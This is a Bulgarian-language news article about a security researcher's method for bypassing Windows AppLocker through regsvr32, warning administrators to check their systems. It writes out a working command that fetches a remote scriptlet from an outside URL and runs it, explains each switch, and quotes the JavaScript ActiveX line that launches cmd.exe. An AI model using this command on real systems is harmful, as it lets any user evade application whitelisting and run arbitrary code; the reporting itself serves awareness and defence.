Ако сте от потребителите или администраторите, които използват Windows AppLocker, трябва да прочетете това.
Разработчик по сигурността съобщи, че е намерил начин за прескачане на защитата на AppLocker с една проста команда, получавайки по този начин възможност за изпълнение на произволни скриптове.
[url=https://technet.microsoft.com/en-us/lib … 44118.aspx“ target=“_blank]AppLocker[/url] позволява на администраторите, които управляват големи мрежи да указват кои приложения могат да бъдат стартирани и кои не, като по този начин се забранява употребата на софтуер, който не е свързан с работата на съответния потребител, както и за защита от вируси. За пръв път AppLocker беше представен в Windows 7.
Разработчикът по сигурността [url=https://twitter.com/subtee“ target=“_blank]Casey Smith[/url] обаче е намерил начин как с една проста команда тази защита може да бъде прескочена. Ето един елементарен пример на командата, която наистина е доста кратка:
regsvr32 /s /n /u /i:http://reg.cx/2kK3 scrobj.dll
С изпълнението на тази команда се изтегля [url=https://gist.githubusercontent.com/subT … malist.sct“ target=“_blank]XML файл[/url] от интернет, който казва на системата да стартира cmd.exe. Идеята тук е, че cmd.exe може да се замени с всяко едно друго забранено от AppLocker приложение и то ще се стартира.
[url=https://technet.microsoft.com/en-us/lib … 90985.aspx“ target=“_blank]regsvr32[/url] е част от операционната система и може да бъде използван за регистриране и дерегистриране на COM скриптове посредством регистрите в Windows. Ключът „s“ казва на regsvr32 да не изкарва съобщения, „n“ му казва да не използва DllRegisterServer, „/i“ прескача опционалния параметър към [url=https://msdn.microsoft.com/en-us/librar … 85%29.aspx“ target=“_blank]DLLinstall[/url], в нашия случай URL адреса, „/u“ означава, че искаме да дерегистрираме даден компонент, а scrobj.dll е Script Component Runtime на Microsoft.
Smith е открил, че ако се даде URL адрес на regsvr32, той ще изтегли файла през HTTP, HTTPS и дори през прокси сървър, а след това ще го обработи и изпълни. С някакъв JavaScript код в изтегления XML файл и провокирайки изпълнението му чрез дерегистрация на .dll, е възможно заобикалянето на забранени от AppLocker приложения. Всеки един потребител може да изпълни дерегистрирането.
В документацията не е добре описано, че regsvr32.exe може да приема URL адреси от скрипт, обяснява Smith.
В горепосочения случай JvavaScript използва ActiveX:
var r = new ActiveXObject(„WScript.Shell“).Run(„cmd.exe“);
Ето и видео на на тази техника в действие:
Smith обяснява, че тази дупка се получава от натрупването с години на стар код, както се получава в Windows. Visual Basic, Powershell, JavaScript скриптове могат да бъдат изпълнявани локално или чрез интернет посредством regsvr32. Smith дори е разработил колекция от скриптове за отдалечено изпълнение на код, включително и отваряне на задни вратички, които доказват тезата му.
Обикновено, за да бъде преодоляна забраната на AppLocker, на потребителя му трябват администраторски права. Тези кодове обаче позволяват на всеки един потребител, дори и с гост акаунт, да преодолее защитата и да пуска софтуер, който е извън одобрения списък.
Ако сте потребител или администратор, който разчита на AppLocker, е хубаво да проверите дали вашата система не е податлива на този трик.
